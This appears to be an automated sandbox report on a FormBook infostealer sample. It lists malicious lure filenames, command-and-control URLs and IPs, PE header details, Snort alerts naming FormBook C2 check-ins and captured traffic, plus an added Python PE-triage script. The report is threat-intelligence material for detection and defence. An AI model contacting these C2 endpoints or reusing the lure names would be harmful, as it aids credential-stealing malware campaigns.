198.54.117.216 | 24032130395451.pdf .exe | malicious | www.oldschoolnews.net/uabu/?ojqD-Z=KdrhxNh8&9r4Hc=ruxw5m/fBZTANxn0+vJzkbJheatIWyH69nVPD3/Jlr0HuUfdGUrtHvekpNeCw/DRWxiy
198.54.117.216 | pdf Re revised PI 900tons.exe | malicious | www.barebeautybrand.com/edbs/?mHId9X=Ekboab0eq8QaRRJsr09zs/Usmrg5EP+fQbkocCp54h0GPmynCi9xyIzJucRcL6VdOaJj4w++gA==&ExlldL=Udg8Tf2pOFu
198.54.117.216 | Ac5RA9R99F.exe | malicious | www.alum2alum.network/evpn/?CZa4=kozDiZlecnkXSK85284p8pD4k2/h1KafOhFtAjgttK/6zeVOB185UpWNMWH27xqr42kf&CPWhW=C8eHk
198.54.117.216 | OrSxEMsYDA.exe | malicious | www.moev.city/svh9/?s4Jxc=06m0IvzpaBhL8Lup&1bw=aJQR8+ngIk9GDIj7vnfNuHFQ6pDOInKj0o660hH8PI/DLizbc1YcQUY1VNOO6dLZdAltgKBIKQ==
198.54.117.216 | Ref. PDF IGAPO17493.exe | malicious | www.barebeautybrand.com/edbs/?BbW=Ekboab0eq8QaRRJsr09zs/Usmrg5EP+fQbkocCp54h0GPmynCi9xyIzJucdcYqZeXKJ1&blX=yVCTVP0X
198.54.117.216 | Quotation.exe | malicious | www.clickqrcoaster.com/fcn/?ndsxlrp=4nVmM3kokLOk5A5KPpUlNAhIJJn3COZ2tebCUHwKvxD3r3Ccio9dbVOfTPTbeaZZl4cM&wZALH=PToxs4gHMXctdDo
198.54.117.216 | DYANAMIC Inquiry.xlsx | malicious | www.boogerstv.com/p2io/?pJE8=G0GpifmhvxtXlZL&-ZoXL=fW2NkW2m2880y7g2f/m+egXTc5dWq8qtohIQX9xRv3Snfsyr1ZmLXRti4FdN58+iKIl8Sw==
198.54.117.216 | ALPHA SCIENCE, INC.exe | malicious | www.911salesrescue.com/sqra/?Rl=pq8KHaLgBYlMb7GR3VJ/cL4dF9VTs2jS1VGjWDfBvu/RR65b3/eoUhDFCE5vmyzJV1nh&_jqT2L=gBg8BF3ptlc
198.54.117.216 | 1517679127365.exe | malicious | www.swavhca.com/ct6a/?YP=fbdhu8lXTJZTH&LhN0T=t85XbN3qNlbTw/JaLNJ7F4/+On2opPlRNjQpYLfn5nRJIrt0zCXnGg8yVYHQwlCaZVdo
198.54.117.216 | TSPO0001978-xlxs.exe | malicious | www.switcheo.finance/uwec/?-ZVd=1bgta&T8VxaVs=3cOH6CffnF8zA2vO0DHvKlrvSwO+w2vUbH/s+qgAJjYXXQ/ohIL0shsdTQ14Zv3dTuQV
198.54.117.216 | igPVY6UByI.exe | malicious | www.dbdcontractlngllc.com/evpn/?6lB4ir3X=HFShCSWXwaKkW2ZiFlcUlPO3+HJMVrrKG3pif6jrFe/K9RUAGcpqC/YV0bjZ8afR2I7A&lZQ=fxoxjP38
198.54.117.216 | order samples 056-062 _pdf.exe | malicious | www.gattisicecream.com/nu8e/?7ntLT=H0OBJMmEUgvZcgBddvaavx+e86Q1Ewqz/q4u2TIdbw6nMChu3R+Cq7j/in+DO7Gj50PD&v4Xpf=oBZl2rip
198.54.117.216 | P.O71540.xlsx | malicious | www.toplevelsealcoating.net/njo/?jpal0=mxuHlFV+ZuSguIs2Jcwsp6DcsuxeedOYcK/5rsXgvOQsfT3joYJg2D4C6z0Ci+7Qc2CgOg==&3ft=fxotnVnH_pxPJD2P
198.54.117.216 | Purchase Order _pdf.exe | malicious | www.doorman.pro/bft/?s8eTn6p=cPB7zr1p3SmwgzYXiBUkF9mwqufO0UDDdPUnBBhQn+hhkWASV2AK1gVN757rEFaij0Eh&2d=lnxh
198.54.117.216 | PO#4503527426.xlsx | malicious | www.oodi.club/j5an/?3f=dOaW3vahSXqg4+CHM7A8brpc4JT3ik1DQ14U6alOEgrJbBQuvLIVfIvFsL19wjAmshOCtA==&SH=u2M0w8Cp
198.54.117.216 | SOA 2.doc | malicious | www.inifinityapps.net/bf3/?pBR=swuzFfg2YELF3Ru0riS9eAlbkrlhpvPYJEoO3kAfMfwngIUjKqHF470zbQhO/y10VYkWvA==&ON6h=lFQLUjPpddS8R0S0

Domains

Match | Associated Sample Name / URL | Detection | Context
parkingpage.namecheap.com | 00098765123POIIU.exe | malicious | 198.54.117.217
parkingpage.namecheap.com | Inquiry_10_05_2021,pdf.exe | malicious | 198.54.117.215
parkingpage.namecheap.com | Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | malicious | 198.54.117.212
parkingpage.namecheap.com | NAVTECO_R1_10_05_2021,pdf.exe | malicious | 198.54.117.212
parkingpage.namecheap.com | POI09876OIUY.exe | malicious | 198.54.117.210
parkingpage.namecheap.com | EDS03932,pdf.exe | malicious | 198.54.117.216
parkingpage.namecheap.com | Purchase Order.exe | malicious | 198.54.117.216
parkingpage.namecheap.com | slot Charges.exe | malicious | 198.54.117.216
parkingpage.namecheap.com | PO09641.exe | malicious | 198.54.117.215
parkingpage.namecheap.com | BORMAR SA_Cotizaci#U00f3n de producto doc.exe | malicious | 198.54.117.211
parkingpage.namecheap.com | Purchase Order-10764.exe | malicious | 198.54.117.212
parkingpage.namecheap.com | 4LkSpeVqKR.exe | malicious | 198.54.117.218
parkingpage.namecheap.com | 2B0CsHzr8o.exe | malicious | 198.54.117.216
parkingpage.namecheap.com | 60b88477_by_Libranalysis.exe | malicious | 198.54.117.215
parkingpage.namecheap.com | DHL Receipt_AWB811470484778.exe | malicious | 198.54.117.217
parkingpage.namecheap.com | NEW ORDER.exe | malicious | 198.54.117.217
parkingpage.namecheap.com | 0876543123.exe | malicious | 198.54.117.210
parkingpage.namecheap.com | g1EhgmCqCD.exe | malicious | 198.54.117.216
parkingpage.namecheap.com | Payment.xlsx | malicious | 198.54.117.210
parkingpage.namecheap.com | w73FtMA4ZTl9NFm.exe | malicious | 198.54.117.212
www.goodcreditcardshome.info | PO9448882.exe | malicious | 18.219.49.238

ASN

Match | Associated Sample Name / URL | Detection | Context
AMAZON-02 (US) | main_setup_x86x64.exe | malicious | 104.192.141.1
AMAZON-02 (US) | A6FAm1ae1j.exe | malicious | 3.138.180.119
AMAZON-02 (US) | New_Order.exe | malicious | 75.2.115.196
AMAZON-02 (US) | NAVTECO_R1_10_05_2021,pdf.exe | malicious | 13.58.50.133
AMAZON-02 (US) | YDHhjjAEFbel88t.exe | malicious | 99.83.175.80
AMAZON-02 (US) | yU7RItYEQ9kCkZE.exe | malicious | 99.83.175.80
AMAZON-02 (US) | Shipment Document BL,INV and packing List.exe | malicious | 52.58.78.16
AMAZON-02 (US) | 4xPBZai06p.dll | malicious | 13.225.75.73
AMAZON-02 (US) | 0OyVQNXrTo.exe | malicious | 3.142.167.54
AMAZON-02 (US) | rAd00Nae9w.dll | malicious | 13.225.75.73
AMAZON-02 (US) | DOC24457188209927.exe | malicious | 13.224.193.2
AMAZON-02 (US) | user-invoice-8488888.doc | malicious | 104.192.141.1
AMAZON-02 (US) | user-invoice-8488888.doc | malicious | 104.192.141.1
AMAZON-02 (US) | ProForma Invoice 20210510.exe | malicious | 13.113.228.117
AMAZON-02 (US) | PO9448882.exe | malicious | 18.219.49.238
AMAZON-02 (US) | jjbxg8kh5X.exe | malicious | 52.216.177.83
AMAZON-02 (US) | 4si5VtPNTe.exe | malicious | 3.6.208.121
AMAZON-02 (US) | latvia-order-051121_.doc | malicious | 52.219.129.63
AMAZON-02 (US) | BANK-ACCOUNT. NUMBER.PDF.exe | malicious | 3.16.197.4
AMAZON-02 (US) | PRF00202156KMT.exe | malicious | 3.16.197.4
UNIFIEDLAYER-AS-1 (US) | catalog-1908475637.xls | malicious | 108.167.180.164
UNIFIEDLAYER-AS-1 (US) | catalog-1908475637.xls | malicious | 108.167.180.164
UNIFIEDLAYER-AS-1 (US) | export of purchase order 7484876.xlsm | malicious | 108.179.232.90
UNIFIEDLAYER-AS-1 (US) | XM7eDjwHqp.xlsm | malicious | 162.241.190.216
UNIFIEDLAYER-AS-1 (US) | QTFsui5pLN.xlsm | malicious | 108.179.232.90
UNIFIEDLAYER-AS-1 (US) | 15j1TCnOiA.xlsm | malicious | 192.185.115.105
UNIFIEDLAYER-AS-1 (US) | e8eRhf3GM0.xlsm | malicious | 162.241.190.216
UNIFIEDLAYER-AS-1 (US) | SOA PDF.exe | malicious | 192.185.226.148
UNIFIEDLAYER-AS-1 (US) | djBLaxEojp.exe | malicious | 192.185.161.67
UNIFIEDLAYER-AS-1 (US) | quotation 35420PDF.exe | malicious | 192.185.41.225
UNIFIEDLAYER-AS-1 (US) | REQUEST FOR PRICE QUOTE - URGENT.pdf.exe | malicious | 162.241.24.59
UNIFIEDLAYER-AS-1 (US) | 551f47ac_by_Libranalysis.xlsm | malicious | 192.185.138.180
UNIFIEDLAYER-AS-1 (US) | invoice and packing list.pdf.exe | malicious | 192.185.136.173
UNIFIEDLAYER-AS-1 (US) | PO82055.exe | malicious | 192.185.161.67
UNIFIEDLAYER-AS-1 (US) | export of document 555091.xlsm | malicious | 192.185.173.71
UNIFIEDLAYER-AS-1 (US) | file.exe | malicious | 192.185.190.186
UNIFIEDLAYER-AS-1 (US) | generated purchase order 6149057.xlsm | malicious | 162.241.55.9
UNIFIEDLAYER-AS-1 (US) | file.exe | malicious | 192.185.186.178
UNIFIEDLAYER-AS-1 (US) | fax 4044.xlsm | malicious | 192.185.173.71
UNIFIEDLAYER-AS-1 (US) | scan of document 5336227.xlsm | malicious | 162.241.55.9
EGIHOSTING (US) | 00098765123POIIU.exe | malicious | 45.39.20.158
EGIHOSTING (US) | INv02938727.exe | malicious | 107.165.40.251
EGIHOSTING (US) | POI09876OIUY.exe | malicious | 45.39.20.158
EGIHOSTING (US) | invscan052021.exe | malicious | 104.252.43.114
EGIHOSTING (US) | PURCHASE ORDER 5112101.xlsx | malicious | 172.252.102.196
EGIHOSTING (US) | Purchase Order.exe | malicious | 45.38.16.182
EGIHOSTING (US) | WAkePI6vWufG5Bb.exe | malicious | 142.111.54.187
EGIHOSTING (US) | new order.xlsx | malicious | 104.252.75.149
EGIHOSTING (US) | Il nuovo ordine e nell'elenco allegato.exe | malicious | 166.88.252.48
EGIHOSTING (US) | 987654OIUYFG.exe | malicious | 104.164.224.84
EGIHOSTING (US) | 2B0CsHzr8o.exe | malicious | 107.186.80.147
EGIHOSTING (US) | REVISED ORDER.exe | malicious | 107.187.161.189
EGIHOSTING (US) | NEW ORDER.exe | malicious | 45.38.16.182
EGIHOSTING (US) | new order.exe | malicious | 45.39.88.129
EGIHOSTING (US) | TT.exe | malicious | 107.165.149.13
EGIHOSTING (US) | a3aa510e_by_Libranalysis.exe | malicious | 104.252.43.114
EGIHOSTING (US) | Airwaybill # 6913321715.exe | malicious | 107.165.10.98
EGIHOSTING (US) | PURCHASE ORDER.exe | malicious | 45.38.16.182
EGIHOSTING (US) | DocNo2300058329.doc__.rtf | malicious | 104.252.43.114
EGIHOSTING (US) | Bill Of Lading & Packing List.pdf.gz.exe | malicious | 104.252.53.97

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order 122001-220 guanzo.exe.log
Process: C:\Users\user\Desktop\Order 122001-220 guanzo.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1314
Entropy (8bit): 5.350128552078965
Encrypted: false
SSDEEP: 24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5: 1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1: B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256: 28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512: 95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.562702233782242
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      File name:Order 122001-220 guanzo.exe
                                                                      File size:736768
                                                                      MD5:9e819bcc826e7a20b0fd139cc4185195
                                                                      SHA1:bdb33c04403e308dcc79ced36201c577a40f0311
                                                                      SHA256:5b09da58ac487c25237bf1a8ba98988af849980d5fe92dd1ca417591b977d7a8
                                                                      SHA512:50af233a3a46a900fedc6b7dd946b69c8f19fef313b32836e84bf5150c6c4c91c9fbe109e1b62250010229a7a3caa33f20c6b65df95e53bc0692cba7b1b47899
                                                                      SSDEEP:12288:m/gn4mlGBkPyasxS/02yp+bqdGvCAPY4EEfySWfzC6v+qsMwWKWO:m4GeadxSB87GvLg6Ibv+ZXV
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[.`.................*...........I... ...`....@.. ....................................@................................

                                                                      File Icon

                                                                      Icon Hash:583cfc1c7062f870

                                                                      Static PE Info

General

Entrypoint: 0x4a49ce
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x60985B9D [Sun May 9 22:01:01 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al   (this line repeats 97 times in the listing)

The jmp is the usual native stub of a managed executable: it jumps through the single IAT slot at 0x402000 (IAT directory at RVA 0x2000 with ImageBase 0x400000), which holds the only import, mscoree.dll!_CorExeMain, so the CLR takes over and the native entry point carries no further code. The 97 repeated "add byte ptr [eax], al" instructions are the disassembly of zero bytes (00 00), i.e. padding that follows the stub.

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xa4974          0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xa8000          0x10e58       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xa6000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0xa29d4       0xa2a00   False     0.848016549769   data       7.76742936293   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.reloc  0xa6000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc   0xa8000          0x10e58       0x11000   False     0.243049172794   data       4.11172065775   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name           RVA      Size     Type                                                                                                    Language  Country
RT_ICON        0xa8130  0x10828  dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_GROUP_ICON  0xb8958  0x14     data
RT_VERSION     0xb896c  0x338    data
RT_MANIFEST    0xb8ca4  0x1b4    XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright MCS 2018
Assembly Version  1.0.0.0
InternalName      DispIdAttribute.exe
FileVersion       1.0.0.0
CompanyName       MCS
LegalTrademarks
Comments
ProductName       Library
ProductVersion    1.0.0.0
FileDescription   Library
OriginalFilename  DispIdAttribute.exe

InternalName and OriginalFilename (DispIdAttribute.exe) do not match the name the file was submitted under (Order 122001-220 guanzo.exe), and the remaining fields are generic (ProductName and FileDescription "Library", CompanyName "MCS"), so the version block gives no trustworthy provenance.
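The static fields above (a CLR header directory, the DLL characteristics flags, and a .text section whose entropy of 7.77 is close to the 8.0 maximum) are what a first-pass triage script pulls out of a PE before running it. The following stdlib-only Python is an added example, not part of the Joe Sandbox report or the sample; it parses those PE32 header fields directly and runs against a constructed header-only stub (not the analysed file), and the 7.0 "packed" threshold is an assumption.

```python
import math
import struct

# Flag names as listed in the report's "DLL Characteristics" field.
DLL_CHARACTERISTICS = {
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x8000: "TERMINAL_SERVER_AWARE",
}
IMAGE_DIRECTORY_ENTRY_IAT = 12
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14   # the CLR header; non-zero means managed code
IMAGE_SCN_MEM_EXECUTE = 0x20000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def triage(buf: bytes) -> dict:
    """Parse the PE32 headers and return the fields a first-pass triage looks at."""
    if buf[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe = struct.unpack_from("<I", buf, 0x3C)[0]                 # e_lfanew
    if buf[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = pe + 4
    _machine, nsect, timestamp, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", buf, coff)
    opt = coff + 20
    if struct.unpack_from("<H", buf, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    entry = struct.unpack_from("<I", buf, opt + 16)[0]
    image_base = struct.unpack_from("<I", buf, opt + 28)[0]
    dll_chars = struct.unpack_from("<H", buf, opt + 70)[0]
    ndirs = struct.unpack_from("<I", buf, opt + 92)[0]
    dirs = [struct.unpack_from("<II", buf, opt + 96 + 8 * i) for i in range(ndirs)]

    sections = []
    for i in range(nsect):
        off = opt + opt_size + 40 * i
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", buf, off)
        flags = struct.unpack_from("<I", buf, off + 36)[0]
        ent = shannon_entropy(buf[rawptr:rawptr + rawsize])
        executable = bool(flags & IMAGE_SCN_MEM_EXECUTE)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "rawsize": rawsize, "entropy": ent,
            "executable": executable,
            # Near-uniform bytes in a code section mean the real code is compressed or
            # encrypted and only exists at run time; 7.0 is an assumed cut-off.
            "packed": executable and ent > 7.0,
        })

    clr_va, clr_size = dirs[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] if ndirs > 14 else (0, 0)
    iat_va = dirs[IMAGE_DIRECTORY_ENTRY_IAT][0] if ndirs > 12 else 0
    return {
        "timestamp": timestamp,
        "entrypoint": image_base + entry,
        "iat_va": image_base + iat_va,
        "dll_characteristics": sorted(n for bit, n in DLL_CHARACTERISTICS.items() if dll_chars & bit),
        "is_dotnet": clr_va != 0 and clr_size != 0,
        "sections": sections,
    }


def build_sample_pe() -> bytes:
    """Constructed PE32 image for this demo (not the analysed sample, not loadable):
    a CLR header entry, the report's DLL characteristics, a uniform-byte .text
    section and an all-zero .rsrc section."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0x60985B9D, 0, 0, 224, 0x0102)
    fmt = "<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6  # PE32 optional header
    opt = struct.pack(fmt, 0x10B, 48, 0,
                      0x200, 0x200, 0, 0x2000, 0x2000, 0x4000, 0x400000, 0x1000, 0x200,
                      4, 0, 0, 0, 4, 0,
                      0, 0x6000, 0x200, 0,
                      2, 0x8540,                 # GUI subsystem; NO_SEH|TSA|DYNAMIC_BASE|NX_COMPAT
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[IMAGE_DIRECTORY_ENTRY_IAT] = (0x2000, 0x8)
    dirs[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] = (0x2008, 0x48)
    opt += b"".join(struct.pack("<II", va, sz) for va, sz in dirs)
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x2000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    sect += struct.pack("<8sIIIIIIHHI", b".rsrc", 0x200, 0x4000, 0x200, 0x400, 0, 0, 0, 0, 0x40000040)
    headers = (dos + b"PE\0\0" + coff + opt + sect).ljust(0x200, b"\0")
    text = bytes(range(256)) * 2             # every byte value twice: entropy exactly 8.0
    rsrc = b"\0" * 0x200                     # constant bytes: entropy 0.0
    return headers + text + rsrc


if __name__ == "__main__":
    r = triage(build_sample_pe())
    print(f"entry 0x{r['entrypoint']:x}  .NET={r['is_dotnet']}  {', '.join(r['dll_characteristics'])}")
    for s in r["sections"]:
        print(f"{s['name']:<8} va=0x{s['va']:x} entropy={s['entropy']:.2f} packed={s['packed']}")
```

Run against a real file with `triage(open(path, "rb").read())`; the same code path reads the section table the report derived its entropy figures from, and the "packed" flag on an executable section is the cue to expect the run-time payload (here the injected FormBook code) rather than to reverse the on-disk .NET assembly alone.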

                                                                      Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP       Dest IP
05/12/21-10:51:18.705997  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49721        80         192.168.2.4     34.102.136.180
05/12/21-10:51:18.705997  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49721        80         192.168.2.4     34.102.136.180
05/12/21-10:51:18.705997  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49721        80         192.168.2.4     34.102.136.180
05/12/21-10:51:18.844483  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49721      34.102.136.180  192.168.2.4
05/12/21-10:51:29.565347  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49723      34.102.136.180  192.168.2.4
05/12/21-10:51:34.680214  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49724        80         192.168.2.4     34.102.136.180
05/12/21-10:51:34.680214  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49724        80         192.168.2.4     34.102.136.180
05/12/21-10:51:34.680214  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49724        80         192.168.2.4     34.102.136.180
05/12/21-10:51:34.817345  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49724      34.102.136.180  192.168.2.4
05/12/21-10:51:47.347272  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49726        80         192.168.2.4     104.164.26.246
05/12/21-10:51:47.347272  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49726        80         192.168.2.4     104.164.26.246
05/12/21-10:51:47.347272  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49726        80         192.168.2.4     104.164.26.246
05/12/21-10:52:09.098131  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49728        80         192.168.2.4     18.219.49.238
05/12/21-10:52:09.098131  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49728        80         192.168.2.4     18.219.49.238
05/12/21-10:52:09.098131  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49728        80         192.168.2.4     18.219.49.238
05/12/21-10:52:14.662301  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49729        80         192.168.2.4     162.241.62.63
05/12/21-10:52:14.662301  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49729        80         192.168.2.4     162.241.62.63
05/12/21-10:52:14.662301  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49729        80         192.168.2.4     162.241.62.63
05/12/21-10:52:20.083382  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49730      34.102.136.180  192.168.2.4

                                                                      Network Port Distribution

TCP Packets

Timestamp                             Source Port  Dest Port  Source IP       Dest IP
May 12, 2021 10:51:18.664244890 CEST  49721        80         192.168.2.4     34.102.136.180
May 12, 2021 10:51:18.705457926 CEST  80           49721      34.102.136.180  192.168.2.4
May 12, 2021 10:51:18.705667019 CEST  49721        80         192.168.2.4     34.102.136.180
May 12, 2021 10:51:18.705996990 CEST  49721        80         192.168.2.4     34.102.136.180
May 12, 2021 10:51:18.748567104 CEST  80           49721      34.102.136.180  192.168.2.4
May 12, 2021 10:51:18.844482899 CEST  80           49721      34.102.136.180  192.168.2.4
May 12, 2021 10:51:18.844995975 CEST  49721        80         192.168.2.4     34.102.136.180
May 12, 2021 10:51:18.845154047 CEST  80           49721      34.102.136.180  192.168.2.4
May 12, 2021 10:51:18.845277071 CEST  49721        80         192.168.2.4     34.102.136.180
May 12, 2021 10:51:18.886292934 CEST  80           49721      34.102.136.180  192.168.2.4
May 12, 2021 10:51:24.035094023 CEST  49722        80         192.168.2.4     66.96.162.130
May 12, 2021 10:51:24.162120104 CEST  80           49722      66.96.162.130   192.168.2.4
May 12, 2021 10:51:24.162272930 CEST  49722        80         192.168.2.4     66.96.162.130
May 12, 2021 10:51:24.162463903 CEST  49722        80         192.168.2.4     66.96.162.130
May 12, 2021 10:51:24.290806055 CEST  80           49722      66.96.162.130   192.168.2.4
May 12, 2021 10:51:24.313256979 CEST  80           49722      66.96.162.130   192.168.2.4
May 12, 2021 10:51:24.313348055 CEST  80           49722      66.96.162.130   192.168.2.4
May 12, 2021 10:51:24.313710928 CEST  49722        80         192.168.2.4     66.96.162.130
May 12, 2021 10:51:24.313878059 CEST  49722        80         192.168.2.4     66.96.162.130
May 12, 2021 10:51:24.441024065 CEST  80           49722      66.96.162.130   192.168.2.4
May 12, 2021 10:51:29.385797977 CEST  49723        80         192.168.2.4     34.102.136.180
May 12, 2021 10:51:29.426841021 CEST  80           49723      34.102.136.180  192.168.2.4
May 12, 2021 10:51:29.426979065 CEST  49723        80         192.168.2.4     34.102.136.180
May 12, 2021 10:51:29.427136898 CEST  49723        80         192.168.2.4     34.102.136.180
May 12, 2021 10:51:29.469638109 CEST  80           49723      34.102.136.180  192.168.2.4
May 12, 2021 10:51:29.565346956 CEST  80           49723      34.102.136.180  192.168.2.4
May 12, 2021 10:51:29.565373898 CEST  80           49723      34.102.136.180  192.168.2.4
May 12, 2021 10:51:29.565687895 CEST  49723        80         192.168.2.4     34.102.136.180
May 12, 2021 10:51:29.565812111 CEST  49723        80         192.168.2.4     34.102.136.180
May 12, 2021 10:51:29.606769085 CEST  80           49723      34.102.136.180  192.168.2.4
May 12, 2021 10:51:34.638822079 CEST  49724        80         192.168.2.4     34.102.136.180
May 12, 2021 10:51:34.679857016 CEST  80           49724      34.102.136.180  192.168.2.4
May 12, 2021 10:51:34.679977894 CEST  49724        80         192.168.2.4     34.102.136.180
May 12, 2021 10:51:34.680213928 CEST  49724        80         192.168.2.4     34.102.136.180
